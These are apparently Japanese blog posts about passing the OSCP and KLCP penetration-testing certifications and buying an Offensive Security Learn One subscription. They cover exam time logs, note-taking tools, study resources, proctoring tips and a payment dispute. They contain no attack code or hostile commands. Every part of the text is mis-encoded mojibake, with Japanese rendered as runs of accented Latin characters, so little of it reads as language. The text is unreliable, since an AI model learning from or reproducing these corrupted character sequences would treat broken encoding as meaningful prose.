æã¯ã¼ãã¼ãããªããæéãæ¥ãã®ãå¾ ã¡ã15ååã«Proctorã½ããã¦ã§ã¢ã¨Webã«ã¡ã©ã®æºåãæ¸ã¾ããVPNã®ã»ããã¢ãããçµãã¦12æã¡ããéãããã¹ã¿ã¼ããã¾ããã
ä¸èº«ã«ã¤ãã¦ã¯è§¦ãã¾ãããã極度ã®ç·å¼µãããããããã¿ã¤ãããããé ç¹ã®é«ãADã»ããï¼ADÃ1ãã¯ã©ã¤ã¢ã³ãÃ2ï¼ãåªå çã«è§¦ã£ã¦ãInitialãã¾ããããªãããä»ã®ãã·ã³ã触ã£ã¦ããã¾ããããªãããæéã ããç¡æ ã«éãã¦ãããï¼æéã溶ãã¦0ç¹ç¶æ ã§ããã
ãã®æ¥ã¯æ¢ãã¦å®¶æãæ è¡ã«è¡ãããã®ã§ã話ãç¸æãè¿ãã«ããªãããç²¾ç¥çã«24æé試é¨ã®ãããããèããããªãããçªããå¤ãçºãã¦çµ¶æã¨ã¯ãããããã¨ãã¨èªèãã¾ããã
æ°æã¡ãåãæ¿ãããã¨åªåãã¦ä¼æ©ãæã¿ãæ¹ãã¦ãã·ã³ãè¦ã¦ã¿ãã¨ããæ å ±ã«æ°ã¥ããããããã¯ç²¾ç¥çä½è£ãçã¾ãã¾ããããã®å¾ã¯ã©ãã®å¾©ç¿ã®ãããªè¦ç´ ãæãã¦é²ãã§ããã以ä¸ã®ãããªæé軸ã§ããã
12æï¼ãã¬ã¤ãã¼ã«
15æï¼ï¼ãã·ã³ç®ã®local.txt
16æï¼ï¼ãã·ã³ç®ã®local.txt
19æï¼ADã»ããã®proof.txtãæ©é£¯ä¼æ©ï¼åãéãã¾ããã§ãããã©ãã«ãé£ã¹ã¾ããï¼
20æï¼ï¼ãã·ã³ç®ã®proof.txt
22æï¼ï¼ãã·ã³ç®ã®local.txtï¼proof.txt
0æï¼å¯ãï¼ã¢ãã¬ããªã³å¤§éæ¾åºã§ãããªã«ç ããï¼
5æï¼ã·ã£ã¯ã¼ãæµ´ã³ã¦æ飯
6æï¼ç²å¾ããtxtã®åç¾æ§ãã§ãã¯ï¼ã³ãããã¹ã¯ã·ã§åãï¼ã ãããï¼æéãããï¼ï¼
12æåï¼ã²ã¼ã ã»ãã
18æï¼è©¦é¨ã¬ãã¼ãï¼ã©ãã¬ãã¼ãæåº
Metasploitã¯ä½¿ããã22æç¹ã§90ç¹ï¼ã«å°éããå®å
¨ã¯ãªã¢ããããã¨æãææãããã¾ããããã©ããã¦ãï¼åãã·ã³ã®æ¨©éææ ¼ãæåãããçµå±ï¼æéç¨åº¦ã¦ãµã®ã®ç©´ãæãç¶ãããã¨ã«ãªã£ãã®ãæãã¾ãã¾ãï¼æ¹ãã¦æ¯ãè¿ãã¨Metasploit使ãã°ããã£ãï¼ã
試é¨ã¬ãã¼ãã¯ãæ¯è¼çä¸å¯§ã«æ¸ããã¤ããã§ãããéä¸ããç´°ããä½ãã®ãæéã«æããã®ã§ã45ãã¼ã¸ç¨åº¦ã§ãã£ããã·ã¥ã§ãã
ãã®ä»
- 試é¨ã¬ãã¼ãï¼ã©ãã¬ãã¼ãã«ã¤ãã¦
Markdownã¨ãå
¨ã触ã£ã¦ããªãã£ãã®ã§ãSnipping Toolããã«æ´»ç¨ããã¨ã¨ãã«ã試é¨ã¬ãã¼ãã¯å
¬å¼ãåºãã¦ããWordããã®ã¾ã¾ä½¿ãã¾ããã
ã©ãã¬ãã¼ãã«ã¤ãã¦ãç§ã¯æ¸ããã¨ãé¸æããã®ã§ãããæéã大éã«å¥ªããã¾ããã¨ã¯ããã¤ã¤ããã¬ãã¼ãä½æãã³ã³ãã³ãã§å©ç¨ããã¦ããæè¡ã«æ
£ãããã¨ãã§ããã®ã§ãå®æ½ãã¦ããã£ãããªã¨æã£ã¦ãã¾ãããã¼ã¸æ°ã¯350ãã¼ã¸ã«ãªãã¾ããããä¸è¨ã®å
¬å¼è¨äºã§ã¯100ãã¼ã¸ä»¥å
ã«åãããã¨ãæ¨å¥¨ããã¦ãã¦æç¶ã¨ãã¦ãã¾ãã»ã»ã»ï½
www.offensive-security.com
- 試é¨ã§ã®ã¡ã¢ã¾ã¨ã
ã©ããå«ãpentest.wsã課éãã¦å©ç¨ãã¾ãããPCFãfaradayã§ããããªã®ã§ãããç²¾ç¥çã«è¿½ãè©°ãããã¦ããæãããç®ã§è¦ã¦ç´æçã«ãããããããå¯è¦åãã¯å¤§äºã¨æãã¾ãããnmapã®xmlãæ¾ãè¾¼ãã ãã§ãã¼ãã®ãªã¼ãã³ï¼ã¯ãã¼ãºããããããããªãã¾ããã¾ãããã¹ãåãOSåã»ãã¼ã¸ã§ã³ãåãã¼ãã®ãµã¼ãã¹åãªã©ãæ¸ãè¾¼ãæ¬ãããã®ã§ãEnumå¿ãé²æ¢ã«å½¹ç«ã¡ã¾ãããä¸ã®ãªã³ã¯ã¯HTBãã·ã³ã®æ»ç¥ã«æ´»ç¨ãã¦ããããã§ãã4å¹´åã®ãã®ãªã®ã§ãUIãå¤å°ç°ãªãç¹ã¯å¾¡çæãã ããã
www.youtube.com
- 試é¨ä¸ã®ã¡ã¢ã®ããã¯ã¢ããã¨ãã観ç¹
å æ¥çªç¶pentest.wsã§ã¢ããªã±ã¼ã·ã§ã³ã¨ã©ã¼ã表示ããã¦ä¸èº«ã触ããªãã¨ããäºæ ï¼äºåã®ã¡ã³ããã³ã¹ãªã©ã®ã¢ãã¦ã³ã¹ãç¡ãï¼ã確èªãã¦ããã®ã§ãpentest.wsã ãã«é ¼ãåãã®ãå±ãªãã¨æããOnenoteãä½µç¨ãã¾ããããã¼ãã·ã¼ãã¯ãã¼ã«ã«ã§ã使ããOnenoteã§æ´çãã¦ãã¾ããã
- ã¿ã¼ããã«ãã°ã«ã¤ãã¦
tmux使ãã§ããªããã¿ã¼ããã«ã大éã«éãç§ã¯scriptã³ãã³ãã使ãã¾ããã§ãããtcpdumpã常æéããã¾ã¾ã«ãã¦ãããã¨ããåºåã大éãããã®ããæ½åºããã®ãé¢åã¨æãã¦ãããåç¾æ§ãã§ãã¯ã®æéãè¨ãã¦ãã£ã¡ãã¨ã¡ã¢ï¼ã¹ã¯ã·ã§ãåãã¨æ±ºãã¦ããããã§ãã
- Offensive security社ã¨SANS社ã®ã³ã³ãã³ãã®æ¯è¼
ããã¯ããããä¸é·ä¸çã¨ãã£ãã¨ããã§ãSANS社ã¯ç¹å®ã®é¨åãæ·±ãæãä¸ãã¦ä¸å¯§ã«èª¬æããã³ã³ãã³ããå¦çã®æè¦ãç©æ¥µçã«åãè¾¼ãã§å·æ°ãã¦ãã¾ããã¾ããOffensive security社ã¯SANS社ã«æ¯ãã¦å¹ ãåºãã®ã§ãããå¾ã¯èªåã§èª¿ã¹ã¦ããã¦ãã ãããã¨å¸¸ã«è¨ããã¦ããæè¦ãããã¾ãããããããç¶ãã¯èªåã§åå¼·ããã¨ããTry Harderã®ç念ã ã¨æãã¾ããããããã®ä¼ç¤¾ãæ¥çãããã¯ã©ã¹ã®æè²ã³ã³ãã³ããçã¿åºãã¦ãããã¨ã«ã¯å¤ããããã¾ããã
- è±èªã«ã¤ãã¦
翻訳ãã¼ã«ãã ãã¶æ®åãã¦ããç¾ç¶ã§ã¯ãåé¨ã«ããã¾ã§åé¡ã¯ç¡ãã¨æãã¾ãããã ãããè¦æã ã¨æéããããããã¨ã«å¤ããã¯ãªãã誤訳ã¾ãã¯èª¤ã£ããã¥ã¢ã³ã¹ãä¼ãããªã¹ã¯ã¯é¿ãããã¾ãããã¾ããæ°ããæè¡ã«ãªãã°ãªãã»ã©æ¥æ¬èªåããã¦ããªããã¨ãè¸ã¾ããã¨ãè±èªãå¦ç¿ããã¨ãããã¨ã¯æ¥µãã¦éè¦ã§ããã¨èªèãã¾ããã
- ã©ããã·ã³ã®ãã¦ã³
ããã¯æ§ã ãªä½é¨è¨ã«éããè¨åããã¦ãããã¨ã§ãããã¹ã¬ããæ°ãé©åã«è¨å®ããªãé«éã¹ãã£ã³ããééã£ãã«ã¼ãã«ã¨ã¯ã¹ããã¤ããããã¨ãã·ã³ããã£ããè½ã¡ã¾ããå®éã®ãããã¬ã¼ã·ã§ã³ãã¹ãã§ãã®ãããªãã¨ãããããããªã訴è¨æ²æ±°ã«ãªãããã¾ãããæã¤æç«ã¦ãç¡ããªã£ãéã®æçµå¥¥ç¾©ã¨ãããã¨ããååãªæ å ±åéã¨æ¤è¨¼ãçµãä¸ã§å®æ½ãããã¨ãå¼·ãæ¨å¥¨ãã¾ãã
- OSCPãã¨ã³ããªã¼ã¯ã©ã¹ã«ä½ç½®ä»ãããã¦ãããã¨
ããã¯çµæè«ã§ãããã®éãã¨æãã¾ãããç¾å®ä¸çã§ã¯ã¢ã³ãã¦ã¤ã«ã¹ã½ãããå種ã»ãã¥ãªãã£è£½åãããä¸ã§mimikatzãèªç±ã«ä½¿ããã±ã¼ã¹ã¯æ¯è¼çå°ãªãããããã¾ããã
ã¾ãããä¸èº«ã®æè¡ã¯ããããããªããã©ãããªææ³ã使ãããã¨ãããæ¼ ç¶ã¨æ»æææ³ãé¸ãã§ãã¾ããã¨ããã£ãã®ã§ãã¡ããã¨ç解ãããæ£ãã人ã«èª¬æããã¨ããç¹ã§ã¯ããå°ãå¦ç¿ãå¿ è¦ã¨ãç解ãã¾ããã
ãã¯ããèªåã§ã¨ã¯ã¹ããã¤ããéçºã§ãããã»ãã¥ãªãã£è£½åãåé¿ã§ããã¨èªä¿¡ãæã¡ããã¨ãã©ãã®éä¸ããæãå§ãã¦ãã¾ããã
ã¾ã¨ã
- éå»ã®åæ ¼ä½é¨è¨ãæ²è¼ãã¦ããã ããçæ§ã«æè¬ãã¾ããåãããã«æãããã¨ã¨ãã¦ãPEN-200ã®ã³ã³ãã³ãããã£ããã¨ãããå¤å°ã®ãã¨ã§ã¯åããªãç²¾ç¥åãããã°åé¡ãªãã¨ããèªèã§ãã
- ãï¼ãããï¼ããå¾ãããã«èªãåå¼·ãããã¨ããæ°æã¡ãããã°ãååã«åé¨è¦ä»¶ãæ´ã£ã¦ããã¨æãã¾ãã
- shellãã³ã¹ãrootãã³ã¹ãªãã¦èª°ããããã¨æãã¾ããããããããããããªãæ°æã¡ããããããã¾ããï½
- 家æã«ã¯æè¬ã§ãã
- ãã£ã¨ããã§metasploit解ç¦ã§ãã
KLCPãåãã¦ãã¾ãã
Offensive Security社ã®å¹´éãµãã¹ã¯ã§ããLearn Oneã«èªè²»ã§ç³ãè¾¼ãã ã®ã§ããã£ããã®æ©ä¼ã¨æãã¦åºç¤åºããå
¼ãã¦KLCPã®è©¦é¨ãåãã¦ãã¾ããã
ã¾ããæ¥æ¬èªè¨äºãæ¤ç´¢ããéãã§ã¯ã»ã¼ãªãã®ã§ãããã¦æ¸ãæ®ãããã¨æãã¾ããã²ã¨ã¾ããèªå®ã¯ããã¾ããã
- KLCPã¨ã¯
- ã«ãªãã¥ã©ã ã«ã¤ãã¦
- 試é¨ã®æ¦è¦ã¨æµã
- ç§ã®ããã¯ã°ã©ã¦ã³ã
- åãçµã¿ã®ã¹ã±ã¸ã¥ã¼ã«æ
- å®éã«åãã試é¨ã§ã®æéé åç
- å½¹ã«ç«ã£ãè³æé¡
- 注æãã¹ãäºé
- ãã¾ãï¼Proctoringã«ã¤ãã¦ï¼
- ææ³ãã¡ãã£ã¨ãããã¿
KLCPã¨ã¯
Kali Linux Certified Professionalã¨ãããKali Linuxã®ãã³ãã¹ãç¨ãã£ã¹ããªãã¥ã¼ã·ã§ã³ããã¹ã¿ã¼ãããã¨ã証æããè³æ ¼ã§ãã
ãªã³ã¯ã«ãè¨è¼ããã¦ããã¨ããããããã¬ã¼ã·ã§ã³ãã¹ãã®æéãã®ãã®ãåä¸ããããã®ã§ã¯ãªããLinuxã®åºç¤ããã£ã¹ããªãã¥ã¼ã·ã§ã³ãã®ãã®ã®ã«ã¹ã¿ãã¤ãºãªã©ãè¡ã£ã¦ããããã¬ã¼ã·ã§ã³ãã¹ãã®å®æ½ã«å¯ä¸ããããã®ç¥èã»æéãèããã¨ãã£ãèãæ¹ã®æ¹ãæ£ãããã¨æãã¾ãã
ã«ãªãã¥ã©ã ã«ã¤ãã¦
ãã°ã¤ã³ä¸è¦ãªå ¬å¼ãã¼ã¸ã«ããã¦ã·ã©ãã¹ã®ãããªãã®ãè¦å½ããããä¸è¨ããã°ããå¼ç¨ããã¨ç«¯æãã¾ããããããªæãã§ãã
- Linuxã®åºç¤
- Kaliã®ã¤ã³ã¹ãã¼ã«ï¼ãã«ãã£ã¹ã¯æå·åããã¬ã·ã¼ãï¼ç¡äººã¤ã³ã¹ãã¼ã«ã®ãã¨ï¼ãä»®æ³ãã·ã³ãªã©ï¼
- æå·åãæ°¸ç¶åããã³ãèªå·±ç ´å£ãã®ãªãã·ã§ã³ãå«ããã¼ã¿ãã«USBã®ä½æ
- Debianããã±ã¼ã¸ããã¼ã¸ã£ã¼ãä»ãã¦ã½ããã¦ã§ã¢ãã¤ã³ã¹ãã¼ã«ãåé¤ãã«ã¹ã¿ãã¤ãºããã©ãã«ã·ã¥ã¼ãã£ã³ã°
- Kaliã®ãã©ãã«ã·ã¥ã¼ãã£ã³ã°ï¼ãã°ã¬ãã¼ããªã©ï¼
- Kaliã«ããããããã¯ã¼ã¯ããã³ãã¡ã¤ã«ã·ã¹ãã æä½ï¼iptablesæä½ãã¢ãã¿ãªã³ã°ãªã©ï¼
- ç¬èªã®ããã±ã¼ã¸ãä½æããç¬èªã®ã«ã¹ã¿ã ããã±ã¼ã¸ãªãã¸ããªããã¹ã
- ç¬èªã®ã«ã¼ãã«ãã«ã¹ã¿ãã¤ãºãæé©åããã³æ§ç¯
- ã¨ã³ã¿ã¼ãã©ã¤ãºç°å¢ã§KaliLinuxãã¹ã±ã¼ãªã³ã°ããã³ãããã¤
- KaliLinuxã®è¤æ°ã¤ã³ã¹ãã¼ã«ã管çã»èª¿æ´
試é¨ã®æ¦è¦ã¨æµã
å ¬å¼ã¯ここã§ãããè¦ç´ããã¨ä»¥ä¸ã®ã¨ããã§ãã
- ï¼ï¼åã§ï¼ï¼åããã©ã¦ã¶ãã¼ã¹ã®ClassMarkerã¨ãããã©ãããã©ã¼ã ã
- å¤å²é¸æå¼
- ä»ã®è¨äºãè¦ãã¨ï¼ï¼ï¼ ã§åæ ¼ï¼ï¼ï¼åã¾ã§ããééããããªãï¼ã
- ã¯ãã¼ãºããã¯ã§æã¡è¾¼ã¿ä¸å¯ï¼è±èªè©¦é¨ã§ãããæãããã¤è¦å ã§ããï¼
- Proctoringãã¼ã«ã«æ¥ç¶å¾ã注æäºé ã®èª¬æãè¡ãããã
- ç£ç£å®ããã£ããã§ãªã³ã¯ãéä¿¡ããã®ã§ããã®ãªã³ã¯ã«é²ãã¨KLCPã®ãã¼ã¸ã表示ãããã
- ã¢ã«ã¦ã³ãç»é²ã¨OS-IDãå ¥ãã¦ãã¿ã³ãæ¼ãã¨è©¦é¨éå§ã
- 試é¨ãçµäºããã¨ãçµæãå³åº§ã«è¡¨ç¤ºãããã
- 試é¨ã«åæ ¼ããã°ãCertificateã®PDFããã¦ã³ãã¼ãã§ãããå ãã¦ãKLCPãã¸ã¿ã«ããã¸ã®ç³è«æç¶ãã®ã¡ã¼ã«ãå±ãã
ç§ã®ããã¯ã°ã©ã¦ã³ã
- æ¬æ¥ã¯éç¨ãããªãããã¼ã¸ã£ã¼è·ãåéãè¦ã¤ãã¦è¶£å³ã§æãåããï¼ã³ãã³ããæã¤ï¼ã¬ãã«Â
- CISSP/CISA/GPEN
- LPIC-2âæ°å¹´åã«å¤±å¹ï¼ä»åã®è©¦é¨ã§ãããæãæç¨ã§ããï¼
- è±èªã¯å¥½ãã ãå¾æã§ã¯ãªããæµ·å¤ã®æ å ±ãgoogle翻訳ã¨å¯¾æ¯ãããªãããã£ããèªãç¨åº¦
- SOC/CSIRTæ¥åãæ°å¹´ç¨åº¦çµé¨ãã¦ãã
- 趣å³ã§GDBãåããã¦ãã
- ã¯ã©ã¦ãã¾ããã®çµé¨å¤ã¯ä½ã
- 診æï¼ãã³ãã¹ãï¼ã®ãä»äºçµé¨ã¯å®è³ª2å¹´ç®
åãçµã¿ã®ã¹ã±ã¸ã¥ã¼ã«æ
Offensive Securityã®ãã¼ã¿ã«ã«Learn Oneã®ãµãã¹ã¯ç»é²ãã¦ããããã1ãæããã¦è³æãã¼ã¡ã¼ã¡ç¿»è¨³ããªããèªã¿ãï¼å¨ç®ã0.5ãæç¨åº¦ä½¿ã£ã¦ãã£ã¨æµãã主ã«ã³ãã³ããæ¼ããã¤ã¤è©¦é¨ã«è¨ã¿ã¾ãããæ¯æ¥ï¼ï½ï¼æéãä¼æ¥ã¯ï¼ï½ï¼æéããã溶ãããæ¥ãããã¾ããã
ãã©ã¯ãã£ã¹ãã¹ããããéããã¨130åãããããã®ã§ãã¾ãã¯ããã®åçãä½æãããã¨ãåããã¦é²ãã¤ã¤ãæ¬çªç´åã«å®éã®è©¦é¨ãæ³å®ãã¦åé¡ã解ããééã£ãã¨ããã®ç¢ºèªãè¡ãã¾ããã
å®éã«åãã試é¨ã§ã®æéé åç
ClassMarkerã¯ãã¢ã½ã³ãªã©ã®è©¦é¨ãåãã¦ããã°é常ã«ç´æçãªUIã§ãããå¿é
ã¯ãããªããã¨æãã¾ãã
www.classmarker.com
試é¨éå§ãã45åã§ä¸éãçµäºããè¦ç´ããããå¾ã30åãæ®ãã¦è©¦é¨ãçµãã¾ãããè±èªããããªã«å¾æã§ã¯ãªãã®ã§ããã決ãã¦é£ããæ§æã¯åºã¦ããªãã£ãã®ã§åºæ¬çãªè±èªãç解ã§ããã°åååãçµããå
容ã§ããã
試é¨ã¯80åä¸75åæ£è§£ã§ç¡äºåæ ¼ãã¾ãããCertificateã¯å³åº§ã«ãã¦ã³ãã¼ãã§ãã¾ãã
å½¹ã«ç«ã£ãè³æé¡
æã¯å ¬å¼è³æï¼ãã©ã¯ãã£ã¹ã¯ã¤ãºãå«ãï¼ãå ¬éããã¦ããããã§ãããé³è åã«ä¼´ãè³æãæ¶ããã¦ãã¾ãããã¼ã¿ã«ä¸ã®æè²ã³ã³ãã³ãã«çµ±åããã¦ããããã§ããéã«ç´¹ä»ãã¦ããè³æ以ä¸ã®ãã®ãã»ã¼ç¡ãæãã§ããã
- å ¬å¼ã®è³æ(PEN-103)
- æµ·å¤ã®å 人ã®ç¥æµãªã©ï¼redditã®ãªã³ã¯ã辿ãã¨100åãããã®ãã©ã¯ãã£ã¹ã¯ã¤ãºãè¦ã¤ããã¾ãï¼
web.archive.org
web.archive.org
www.gocertify.com
注æãã¹ãäºé
åºæ¬ã¯å ¬å¼è³æã®å¦ç¿ãªã®ã§ããã以ä¸ã®ç¹ã«ã¤ãã¦ãæ°ãä»ããã ããã
- Kaliã®ãã£ã¹ããªãã¥ã¼ã·ã§ã³ã®ç¹æ§ããä¿®æ£é »åº¦ãæ©ããå ¬å¼è³æã®æ´æ°ãéã«åã£ã¦ããªã
- ãªã³ã¯åããã
- æ¢ã«kaliã®ãªãã¸ããªããåé¤ãããããã±ã¼ã¸ãç´¹ä»ãã¦ããã±ã¼ã¹
- æ代ã®æµãã§æ¡ç¨ãããã¼ã«çãå¤ãã£ã¦ããï¼ã©ã£ã¡ãæ£è§£ããããã«ãã
- æ¥æ¬èªã®ç¿»è¨³ãã¼ã«ã使ãã¨èª¤è¨³ããããè±èªããã®ã¾ã¾èªãããªã訳ããªãæ¹ãè¯ãï¼ããã¯ãããªãå ´åãæ¥æ¬èªãèªãã å¾ã«è±èªã§æ£ãããã確èªããå¿ è¦ããï¼
以ä¸ã®çç±ãããgoogleå
çã«æããä¹ããªããå®éã«Kaliã®ç°å¢ãææ¢ãã§ç¢ºèªãããªã©ãè¯ãã¨æãã¾ãã
ãã¾ãï¼Proctoringã«ã¤ãã¦ï¼
æå ã®ç°å¢ãï¼ç»é¢ãªã®ã§ãOSCPãè¦è¶ãã¦ãã¢ã½ã³ã§åé¨ããProctoringãã¼ã«ã使ã£ã¦åé¨ãã¾ããããã®æã«æ³¨æããç¹ã¨ãã¦ã
äºåã®Proctoringãã¼ã«ã®ãã¹ããã§ããã®ã§ååã®äººã¯ç¢ºå®ã«ãã£ãæ¹ãè¯ãã
proctoringï¼ ã«ãã¹ãããããæ¨ãé£çµ¡ããã¨ãã¹ãç¨IDããããã¾ãããã ãããã°ã¤ã³ãã¦ããã®ã»ãã·ã§ã³æå¹æéãé常ã«çãï¼æ°ååï¼ï¼ã®ã§ãããããããã¥ã¢ã«ãèªã¿è¾¼ãã§æºåãããã¨ããå§ããã¾ããç§ã¯ï¼æ¥ã»ã©åã«ãã¹ãããã«ã¡ã©ãï¼ã¤ãã£ã¦ãã¾ããããç¦ãã¾ããããã®å ´ã§åé¡ã解決ã§ãã¦ããã£ãã§ãã
Janusãã©ã°ã¤ã³ã§ç»é¢å ±æãæ£ããåä½ãã¦ããããå¤æã§ããªãã
ããã¯ãããã«ä¸å®ã«ãªã£ã¦Offensive Security社ã«ç¢ºèªããã¨ãããã¢ãµã¤ã³ãããç£ç£å®ãå¤æããã¨ã®ãã¨ãããã ãã§ãä¸å®ã§å½æ¥ãã©ãã«ãé¿ãããã£ãã®ã§ãä¸è¨ãµã¤ãã§ãã¹ããã¾ãããæ£å¸¸ã«åä½ãã¦ããã°ç»é¢ãåºã¾ãã
webrtc.github.io
ææ³ãã¡ãã£ã¨ãããã¿
- OSCPã«ã¯å¿ é ã§ã¯ãªããç¥èã¨ãã¦æã£ã¦ããã¨å¤å°å®å¿ããç¨åº¦ã
- LPIC1/2ï¼Kaliã®ç¬ç¹ãªå 容ï¼Debianã«æ £ãã試é¨ãLPICã®ãããªã³ãã³ãå ¥ååé¡ãç¡ãåå¤å°æ°æ¥½ã
- åæ ¼ã¯ï¼å²ã¨ãã¼ãã«ã¯é«ããã試é¨èªä½ã¯ã¹ãã¬ã¼ããªå°è±¡ã§CISSPã®ãããª2åã®1ããã®é¸æã§ã¯ãªãæãããã£ããé ã«å©ãè¾¼ãã°å¤§ä¸å¤«ããã
- ããç¨åº¦æçãããã³ãã¹ã¿ã¼ãç¬èªã®ãã¼ã«ãããã±ã¼ã¸ã³ã°ããã¹ããããã¨ããã±ã¼ã¹ã«ãã®ç¥èãæç¨ãã
- éã«ãã¹ã¿ã¼ã«ãªãç«ã¦ã®äººã¯åºæ¬çãªLinuxã®ç¥èãaptï¼ããã±ã¼ã¸æä½ã®ã³ãã³ãï¼ã®åé¡è§£æ±ºæé ãæ¼ãããã¨ããç¹ã§æ´»ç¨ã§ããããã ãã«ã¼ãã«ã®åæ§ç¯ããªããã±ã¼ã¸ã³ã°ã®ã¨ããã¯ä¿®è¡ææºè¼ã
- ARMã®æ¼ç¿ãããããã«ã©ãºãã¤ãè²·ããã¨æã£ããé«é¨°ãã¦ãã¦è²·ããªãã£ãï½
- ãã¹ãäºç´ãã¡ã¼ã«ã§ããéãæ¥æ¬æéã®ãæï¼UTC+9ï¼ã¨ãã£ã表ç¾ã§èª¬æãããã¨ããããã¾ãç解ãããã«èª¤ã£ãæéãè¨å®ããããäºç´ã®éã¯JSTã®ãã¨ãèããGMT/UTCã®æéã§ãã£ãã説æãã¾ãããï¼åçï¼ã
ãã¦ãããããããããOSCPã®éã«å ¥ãã¾ããmacbookç¸å½ã®åºè²»ãåãè¿ããªãã¨ã
Offensive Securityã®Learn Oneï¼å¹´éãµãã¹ã¯ï¼ã«ç³ãè¾¼ã¿ã¾ãã
åå¿é²ãããã¦ã
12æ31æ¥ã
å¹´æ«ã»ã¼ã«ã¨ã¯ãã$2,499â$1,999ï¼ç´24ä¸åï¼ã¨ããæ°è»½ã«ã¯ã§ããªãå¹´éãµãã¹ã¯ãOffensive Security社ã®ãã¬ã¼ãã³ã°ã³ã¼ã¹ã§ããLearn Oneã«æãæ»ã£ã¦ããã£ã¦ãã¾ãã¾ãããç®æ¨ããã£ãã決ããªãã¨æ¥å¹´ããã©ãã©éããã¦ãã¾ãããã ã£ãã®ã§ãèªæã®å¿µãããã¦èª²éãã¾ããããã¼ãPCã«ãã¼ã«ãããã¦å£ãã¦ãã¾ããmacbookããããè²·ãç´ããã¨æããã¨ã«ãã¾ãï¼ãã¼ãPCã¯å£ãã¦ãªããã©ï¼ã
ç®æ¨ã¯OSCPãOSWPã®åå¾ãªã®ã§PEN-200(PWK)ã®ã³ã¼ã¹ãé¸ã³ã¾ããã
Learn Oneã§ã§ãããã¨(PEN-200ãé¸æããå ´å)
- PEN-200(Penetration Testing)ã®ãã¬ã¼ãã³ã°ã³ã¼ã¹ãåè¬å¯è½ã
ï½°>ã©ãã¯å¹´éãµãã¹ã¯ã®æéãã£ã¨ä½¿ãã
- OSCP(Offensive Security Certified Professional)ã®è©¦é¨ãï¼ååé¨ã§ããã
- Proving Grounds Practiceãå¹´éãµãã¹ã¯ã®éã§å©ç¨å¯è½
ã¹ãã«åä¸ã®ããã®ã¹ã¿ã³ãã¢ãã³ãªã©ããç¡æ(PG Play)ã§ã使ããããï¼æ¥ï¼æéã¾ã§ã¨ããå¶ç´ãããæå(Practice)ã ã¨ãã®å¶éããªããWindowsOSã触ãããããã
www.offensive-security.com
- PEN-100ãSOC-100(Security Operations)ãWEB-100(Web Attacks)ã®åºç¤ã³ã³ãã³ããå©ç¨å¯è½ã
ã¾ã PEN-100ã®Linuxåºç¤ãã触ã£ã¦ãã¾ããããè¦ãæãLPIC1ï½2ï¼ããããã®ã¸ã£ã³ã«ã®åºç¤ãã¿ãªã®ã§ããã§ã«Hacktheboxã§easyããããªãåããã¨ããæ¹ããOSCPä¸ç´ç·ã§ã©ãéè¦ãããã®ã§æéãæããã¨ããæ¹ãLearn Oneãç³ãè¾¼ãã§ããªã人ã¯ãã¾ãæ°ã«ããªãã¦ãããã¨æãã¾ãããã ãCTFã£ã½ãä»ä¸ãããã¦ãã¦å人çã«ã¯å²ã¨é¢ç½ããªãã¨æãã¦ãã£ã¦ãã¾ãã
- KLCP(Kali Linux Certified Professional)ã®è©¦é¨ãï¼ååããããã
Kali Linuxã®ãã£ã¹ããªãã¥ã¼ã·ã§ã³ãã®ãã®ã«é¢ããç¥èãç¿å¾ãããã®ãããã
kali.training
- OSWP(Offensive Security Wireless Attacks)ã®ãã¬ã¼ãã³ã°ã³ã³ãã³ããå試é¨ãï¼ååããããã
ã¬ã¸ã¹ããããã
ãã¾ãæ©ãè¦ç´ ã¯ç¡ãã¨æã£ã¦ããã®ã§ãããã«ã¼ãã§æ¯æããããã¨ããããã¾ããããªãã¦ä»æ¹ãªãpaypalã«ãã¾ããã
ã¨ãããããã§åé¡çºçãpaypalèªä½ã®æ¯æãã¯ãã¾ããã£ã¦ã¡ã¼ã«ã®éç¥ãããã®ã§ããã決æ¸çµäºããOffsecã®ãµã¤ãã«ãªãã¤ã¬ã¯ããããéã«ã¾ããã®DNSã¨ã©ã¼ãåºã¦ãå½ç¶ãªãã¼ããã¦ããã§ãã¯ã¢ã¦ãç»é¢ãåºãªãã
ä¸ç¬é ãçã£ç½ã«ãªãã¾ãããããã¯ãã£ããã«ã¹ã¿ãã¼ãµã¼ãã¹ç¸è«æ¡ä»¶ã¨ãããã¨ã§ã¡ã¼ã«é£çµ¡ããããªã¨ãããããTry Harderãï½ã¨ããåãªãã
é£çµ¡ãããã©æ¡ã®å®å¹´æ«å¹´å§ã¯ç¸®å°æ
å¢ã ããå
¬å¼ãªã¬ã¹ã¯ã§ããã¼ãã¨èªåè¿ä¿¡ããã£ã¦ç©ãã ãæ¯æãçµãã£ã¦ãããããªãã¨ããªãã ãã¨èªåã«è¨ãèããã¦ããã
2022/1/10 update
å¹´æãããã«ã«ã¹ã¿ãã¼ãµãã¼ãã®äººã¨å°åããã¼ã¸ã£ã¼ããããé£çµ¡ãããã ãã¾ããã
å
ã«å°åããã¼ã¸ã£ã¼ããããé£çµ¡ãæ¥ã¦ãEOYã®ãã£ã¹ã«ã¦ã³ãã¯çµãã£ã¦ãããã10%ãªããªãæ¿ããï½ã¨ã®ã³ã¡ã³ãï¼è¿½å ã§2.5ä¸åããªããããããï¼ã
ããã«ã«ã¹ã¿ãã¼ãµãã¼ãããã¯ãã¡ã®ã·ã¹ãã ã¯ä½ã®åé¡ããªããããåã®éè¡ã®åé¡ã ããããã£ã¡ã§ç¢ºèªãã¦ããã¨ã®ãã¨ã
ãã£ã¡ã«ã¯paypalã®å
¥é証æãããã®ã«è¿½å è²»ç¨ã¯ãã¼ã ãã¨æã£ã¦ãåããããªããã¨ããpaypalã«disputeãããã¨ã«ãã¾ããã
ãããã話ã¯é²ã¿ãã«ã¹ã¿ãã¼ãµãã¼ãã®äººã対å¿ãã¦ããã¦ä¸æ®µè½ã
è¿éãããããµãã¹ã¯ãæåã§ã¢ã«ã¦ã³ãã«è¿½å ãããé¸ãã§ããã¨è¨ããã¾ããããã£ããç³ãè¾¼ãã ã®ã§ããµãã¹ã¯è¿½å ããé¡ããã¾ããã
2022/1/22 update
éçºãã¼ã ã®æ¹ãæ°è¦ã¢ã«ã¦ã³ãã«ãµãã¹ã¯å
容ï¼Learn Oneï¼ããããã¸ã§ãã³ã°ãã¦ããããã¨ã§è§£æ±ºããPEN-200ã¨ããããã®ãã®ä»ã®ã³ã¼ã¹ã追å ãã¦ãããã¾ããã
ãã¡ããå試é¨ãäºç´ã§ããã確èªãã¦ã¿ãããOSCPã®è©¦é¨äºç´ã¯ã§ãããã ã£ããã©ãKLCPã¨OSWPã¯ä»¥ä¸ã®éãããã¼ã¿ã«ä¸ããäºç´ã§ããªããããªããã¨ç¦ãã
